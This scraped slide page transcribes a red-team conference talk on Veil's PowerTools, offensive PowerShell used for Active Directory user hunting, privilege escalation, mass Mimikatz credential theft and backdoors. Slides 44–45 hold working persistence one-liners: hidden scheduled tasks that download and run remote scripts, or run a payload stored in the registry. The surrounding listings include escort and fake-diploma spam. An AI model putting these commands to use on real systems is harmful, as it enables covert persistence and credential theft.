The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 

More from Will Schroeder (9)

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
 
Certified Pre-Owned
Certified Pre-OwnedCertified Pre-Owned
Certified Pre-Owned
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 

Recently uploaded

Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...kajalverma014
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdfMatthew Sinclair
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样ayvbos
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsMonica Sydney
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge GraphsEleniIlkou
 
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac RoomVip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Roommeghakumariji156
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiMonica Sydney
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...kumargunjan9515
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsMonica Sydney
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查ydyuyu
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtrahman018755
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查ydyuyu
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoilmeghakumariji156
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...gajnagarg
 
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsMonica Sydney
 
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime BalliaBallia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Balliameghakumariji156
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfJOHNBEBONYAP1
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasDigicorns Technologies
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 

Recently uploaded (20)

Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
 
20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf20240508 QFM014 Elixir Reading List April 2024.pdf
20240508 QFM014 Elixir Reading List April 2024.pdf
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
Call girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girlsCall girls Service in Ajman 0505086370 Ajman call girls
Call girls Service in Ajman 0505086370 Ajman call girls
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac RoomVip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
 
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...Local Call Girls in Seoni  9332606886 HOT & SEXY Models beautiful and charmin...
Local Call Girls in Seoni 9332606886 HOT & SEXY Models beautiful and charmin...
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime NagercoilNagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
Nagercoil Escorts Service Girl ^ 9332606886, WhatsApp Anytime Nagercoil
 
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
Top profile Call Girls In Dindigul [ 7014168258 ] Call Me For Genuine Models ...
 
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
 
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime BalliaBallia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 

Drilling deeper with Veil's PowerTools

  • 1. Drilling Deeper with Veil’s PowerTools Justin Warner, Will Schroeder Veris Group’s Adaptive Threat Division
  • 2. @sixdub ◎Pentester and red teamer for the Adaptive Threat Division of Veris Group ◎Lots of interest: red team ops, reverse engineering, adversarial tactics, etc ◎Developer on the Veil-Framework and co-founder of Veil’s PowerTools
  • 3. @harmj0y ◎Security researcher and red teamer for the Adaptive Threat Division of Veris Group ◎Co-founder of the Veil-Framework and founder of Veil’s PowerTools ◎Cons: Shmoocon, CarolinaCon, Defcon, Derbycon, various BSides
  • 6. The Veil-Framework ◎An offensive toolkit aimed at bridging the gap between pentesting and red teaming capabilities ◎Started with the release of Veil-Evasion ○ expanded with Catapult, Pillage, and PowerView ◎CarolinaCon 2014 - “The Veil- Framework”
  • 7. Veil’s PowerTools ◎All of our offensive PowerShell work from the Veil-Framework (and other projects) was pulled into the new PowerTools repo ◎PowerTools will remain the primary source for all PowerShell work, with the Veil repo containing offensive Python projects
  • 8. Sidenote: Why PowerShell ○ PowerShell provides (out of the box): □ Full .NET access □ application whitelisting □ direct access to the Win32 API □ ability to execute purely in memory □ default installation Win7+ ! ○ “Why I Choose PowerShell as an Attack Platform” □ http://www.exploit-monday.com/2012/08/Why-I- Choose-PowerShell.html
  • 12. ◎Think dsquery on steroids... and cocaine ◎First started because a client banned “net” commands on domain machines ◎Otherwise initially inspired by Rob Fuller’s netview.exe tool ○ Wanted something more flexible that also didn’t drop a binary to disk Background
  • 13. User Hunting ◎Goal: find which domain machines specific users are logged into ◎Invoke-UserHunter: finds where target users or group members are logged into on the network ◎Invoke-StealthUserHunter: extracts user homeDirectories from AD, gets sessions on all these file servers to hunt for targets ○ Significantly less traffic than Invoke-UserHunter
  • 14. Offensive Event Parsing ◎Once you get DA, domain controller event logs make it trivial to track down user locations ◎PowerView’s Get-UserLogonEvents lets you easily extract account logon events (4624) from a host ◎Invoke-UserEventHunter wraps this all up into a weaponized form
  • 15. Domain Trusts ◎PowerView can now enumerate and exploit existing domain trusts: ○ Get-NetDomainTrusts, Get-NetForestDomains ◎Most PowerView functions now accept a “-Domain <name>” flag, allowing them to operate across trusts ○ e.g. Get-NetUsers –Domain sub.test.local ◎Invoke-MapDomainTrusts can recursively map all reachable trusts from a foothold
  • 16.
  • 17. Data Mining ◎PowerView’s Invoke-ShareFinder - CheckAccess can find all shares readable by the current user ◎Invoke-FileFinder can search a network for open file shares, or take a share list from Invoke-ShareFinder ◎Spits out a .csv of found files, sortable by creation or last access times
  • 19. Background ◎On past assessments, had to escalate privileges on a locked down workstation ◎Kernel exploits wouldn’t work, so fell back to vulnerable service binaries ◎More or less did everything manually, wanted something a bit easier ○ Started implementing the “Encyclopedia of Privesc”
  • 20. Windows Services ◎One of the most effective escalation vectors was (and still is) vulnerable Windows services ○ Sometimes can modify a service itself ○ Get-ServicePerms will check for these ◎However, many organizations overlook the permissions for service binaries :) ○ Use Get-ServiceEXEPerms, then overwrite the service binary to add a local user or install an agent
  • 21. .DLL Hijacking ◎Many programs/services will search in multiple locations when loading, including directories listed in the PATH environment variable ◎If you have write access to any folder in PATH, there’s a good chance you can drop a malicious DLL and escalate privileges ○ Invoke-FindPathHijack will search for these opportunities
  • 22. PowerUp ◎Automates everything we’ve talked about, and more ◎Invoke-AllChecks will run all current checks against a host ◎Functions exist to abuse most of the escalation vectors found
  • 24. Background ◎ Incident responders are recognizing and targeting PowerShell.exe ○ Had a client write HIPS rules against psh_psexec, YA, for reals ◎ We wanted to be prepared for more situations like this ◎ Developed PowerPick as a combination of solutions to run PowerShell without powershell.exe
  • 25. Bypassing the Blacklist ◎ Used assemblies in .NET/C# to execute code ○ System.Management.Automation ◎ Developed SharpPick ○ http://www.sixdub.net/2014/12/02/inexorable- powershell-a-red-teamers-tale-of-overcoming- simple-applocker-policies/ ◎ To defeat with blacklist policy (not ideal), must permission off or block DLLs in the Global Assembly Cache (GAC) ○ C:WindowsAssembly*
  • 27. Runspaces in Unmanaged Code ◎SharpPick wasn’t very sexy ○ Binary on disk = Lame! ◎Lee Christensen (@tifkin_) authored “UnmanagedPowerShell” to utilize .NET assemblies from C ○ Uses CLR and custom .NET assembly in memory ○ https://github.com/leechristensen/UnmanagedPo werShell ◎Transformed this code into a reflective DLL = ReflectivePick
  • 28. PowerShell Inception = Injection!! ◎Decided it needed more PowerShell ◎Embedded ReflectivePick into Invoke- ReflectivePEInjection from Powersploit by @josephbialek ○ Created Invoke-PSInjector ◎Injects DLL into remote process that runs PowerShell code
  • 32.
  • 33. Invoke-Mass* ◎Model to run PowerShell scripts on a mass number of machines and retrieve results: 1. A jobbified webserver is kicked off in the background which serves out a specified PowerShell file 2. A IEX() one-liner is executed on machines through WMI to download/executed the hosted code 3. Results are POSTed back to the local webserver
  • 34. Invoke-MassMimikatz ◎Executes PowerSploit’s Invoke- Mimikatz on multiple machines without PSRemoting ◎Raw Mimikatz results are saved on the pivot host ◎Result files are parsed and Server:Credential objects are output to the pipeline
  • 36. Invoke-MassSearch ◎Microsoft has another gift for attackers, the Windows Search Indexing Service ○ Why search through all of a system’s file when Windows does this for you? ◎Invoke-MassSearch performs the same pattern as Invoke-MassMimikatz ○ allows you to query the search indexer across machines where you have admin access
  • 38. Background ◎One obvious gap remaining in workflow of Veil PowerTools ◎Motivation: offense in depth theory ◎Wanted multiple easy ways to remain resident on the compromised systems ○ Memory only
  • 39. PowerBreach ◎Yes… More PowerShell ○ Why not utilize our favorite scripting language?! ◎Goal: automate a bunch of techniques/tools to backdoor a system ◎Multiple triggers, various host/network signatures ○ We will show some of the “cool” ones
  • 40. Invoke-EventLogBackdoor ◎Based on Shmoocon 2013 “Wipe The Drive” by Jake Williams (@MalwareJake) ◎Uses Get-WinEvent to monitor windows event logs for failed RDP attempts ◎When it recognizes “trigger” username, phones home to attacker ○ With an IEX(...) download cradle
  • 41. Invoke-PortKnockBackdoor ◎Based upon Get-Packet by Robbie Foust http://blog.robbiefoust.com/?p=68 ○ Uses system.net.sockets.socket to create raw socket ○ Uses socket.iocontrol to make promiscuous ◎Promiscuously sniffs traffic on system and inspects data for “magic” trigger value ○ UDP, TCP, ICMP
  • 42. Invoke-DeadUserBackdoor ◎Common action of attackers is to add domain/local users ◎Uses ADSI to monitor for a users existence ◎If the user is not found, assumes the worst and phones home
  • 43. Invoke-ResolverBackdoor ◎Attempts to be a little stealthier and usable on external assessments ◎Resolves specified DNS name on interval and if the resolution doesn’t equal a predefined IP... ◎… PHONE HOME TO THAT IP!
  • 44. Persistence… If you must ◎Focuses more on non-persistent backdoors ◎Schedule tasks seem to work really well for PowerShell in domain networks schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -NonI -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://server/scri pt.ps1'''))'" /sc onlogon /ru System
  • 45. Registry Storage ◎Better yet, stage your script in the registry! $backdoor = "write-host 123” Set-ItemProperty -Path 'HKLM:HARDWARE' -Name 'secret' -Value $backdoor schtasks /create /tn Updater /tr "powershell -c 'IEX (gp HKLM:HARDWARE secret).secret'" /sc onlogon /ru System
  • 46. So what? ◎Nothing revolutionary here! ◎Nothing worse than owning a system and not being able to get back on later! ◎Real power comes when combining PowerTools ○ PewPewPew with PowerBreach
  • 47. 2 Cents Almost ready for the show!
  • 48. Obligatory Defense Slide ◎HIPs and Whitelisting generally help endpoint defense ◎Enterprise incident response capabilities ○ Memory only capabilities but scripts (“malware”) able to be easily recovered and analyzed ◎Need a clear way to restrict PowerShell & .NET assemblies to certain users
  • 50. Demos
  • 51. Questions? ◎Justin ○ @sixsub ○ http://www.sixdub.net/ ○ justin [at] sixdub.net ◎Will ○ @harmj0y ○ http://blog.harmj0y.net/ ○ will [at] harmj0y.net ◎https://github.com/veil-framework/PowerTools